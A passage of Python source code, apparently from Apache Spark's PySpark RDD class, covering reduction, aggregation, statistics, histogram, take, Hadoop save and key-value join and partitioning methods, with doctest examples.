try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
